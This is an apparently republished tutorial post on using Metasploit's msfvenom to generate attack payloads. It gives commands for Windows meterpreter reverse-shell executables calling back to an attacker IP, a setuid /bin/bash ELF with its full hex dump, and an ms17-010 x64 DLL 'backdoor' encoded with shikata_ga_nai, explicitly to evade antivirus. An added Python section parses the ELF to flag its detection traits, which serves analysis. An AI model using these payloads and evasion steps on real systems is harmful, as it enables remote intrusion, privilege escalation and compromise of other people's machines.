Using msfvenom

Source: Internet | Editor: 程序博客网 | Date: 2024/06/05 07:45

References:
http://www.zerokeeper.com/tools/use-of-msfvenom.html
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

Msfvenom is a combination of payload generation and encoding. It replaces msfpayload and msfencode as of June 8, 2015.

Generating a payload

To generate a payload with msfvenom you must specify two options: -p/--payload and -f/--format.
Listing the available payloads:

➜  ~ msfvenom -l payloads
Framework Payloads (473 total)
==============================

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                             Spawn a shell on an established connection
    aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell
    android/meterpreter/reverse_http                    Run a meterpreter server in Android. Tunnel communication over HTTP
    android/meterpreter/reverse_https                   Run a meterpreter server in Android. Tunnel communication over HTTPS
    android/meterpreter/reverse_tcp                     Run a meterpreter server in Android. Connect back stager
    ...

➜  ~ msfvenom -l payloads|wc -l
480

An example:

msfvenom -p windows/meterpreter/bind_tcp -f exe

The usual form is:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe

My shell history has this usage:

➜  ~ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf |xxd -i
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 52 bytes
Final size of elf file: 136 bytes
  0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
  0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
  0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
  0x89, 0xe1, 0xcd, 0x80

➜  ~ man xxd
# -i | -include   output in C include file style.
# -p | plain      plain hexdump style.

➜  ~ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf |xxd -p
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 52 bytes
Final size of elf file: 136 bytes
7f454c460101010000000000000000000200030001000000548004083400000000000000000000003400200001000000000000000100000000000000008004080080040888000000bc000000070000000010000031db6a1758cd806a0b58995266682d6389e7682f736800682f62696e89e352e80a0000002f62696e2f6261736800575389e1cd80
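The 136-byte ELF above is worth looking at from the analyst's side: it is a bare ELF32 header, one program header, and the 52-byte payload at the entry point. The following added example (my own code, not part of the original post or of msfvenom) parses exactly those bytes, copied from the `xxd -p` output, and reports the traits a reviewer or detection rule would key on: a single PT_LOAD segment mapped read/write/execute, an entry point sitting right after the headers, and the `setuid(0)` prologue that `PrependSetuid=True` places in front of the payload. The prologue signature and the `parse_tiny_elf` name are mine.

```python
import struct

# Input: the 136-byte ELF shown above, copied from the page's `xxd -p` output
# and laid out in the 12-byte rows that `xxd -i` printed.
ELF_HEX = (
    "7f454c460101010000000000" "000000000200030001000000"
    "548004083400000000000000" "000000003400200001000000"
    "000000000100000000000000" "008004080080040888000000"
    "bc0000000700000000100000" "31db6a1758cd806a0b589952"
    "66682d6389e7682f73680068" "2f62696e89e352e80a000000"
    "2f62696e2f62617368005753" "89e1cd80"
)
ELF_BYTES = bytes.fromhex(ELF_HEX)

# i386 Linux setuid(0) prologue emitted by PrependSetuid=True (my signature):
#   xor ebx,ebx ; push 0x17 ; pop eax ; int 0x80   (syscall 23 = setuid)
SETUID_PROLOGUE = bytes.fromhex("31db6a1758cd80")

def parse_tiny_elf(data):
    """Parse an ELF32 header plus its single program header and locate the
    payload that starts at the entry point. Raises ValueError on mismatch."""
    if data[:4] != b"\x7fELF" or data[4] != 1:          # ELFCLASS32 only
        raise ValueError("not a 32-bit ELF")
    (e_type, e_machine, _ver, e_entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum) = struct.unpack_from("<HHIIIIIHHH", data, 16)
    if e_phnum != 1 or e_phentsize != 32:
        raise ValueError("expected exactly one 32-byte program header")
    (p_type, p_offset, p_vaddr, _paddr, p_filesz, p_memsz,
     p_flags, _align) = struct.unpack_from("<IIIIIIII", data, e_phoff)
    if p_type != 1:                                     # PT_LOAD
        raise ValueError("segment is not PT_LOAD")
    payload_off = e_entry - p_vaddr + p_offset          # entry VA -> file offset
    payload = data[payload_off:p_offset + p_filesz]
    return {
        "type": e_type, "machine": e_machine, "entry": e_entry,
        "segment_rwx": (p_flags & 7) == 7,              # PF_R | PF_W | PF_X
        "filesz": p_filesz, "memsz": p_memsz,
        "payload_offset": payload_off, "payload_len": len(payload),
        "prepend_setuid": payload.startswith(SETUID_PROLOGUE),
    }

if __name__ == "__main__":
    for key, value in parse_tiny_elf(ELF_BYTES).items():
        print(f"{key:>15}: {value}")
```

The reported `payload_len` of 52 matches the "Payload size: 52 bytes" line msfvenom printed, and `filesz` of 136 matches "Final size of elf file".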

Another example: generating the x64 DLL backdoor for ms17-010. You can also use the -i flag to encode the payload multiple times; sometimes more iterations help avoid antivirus.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.170.135 LPORT=4444 -i 3 -e x86/shikata_ga_nai -f dll > backdoor_x64.dll

The -b flag is meant to be used to avoid certain characters in the payload. When this option is used, msfvenom will automatically find a suitable encoder to encode the payload:

msfvenom -p windows/meterpreter/bind_tcp -b '\x00' -f raw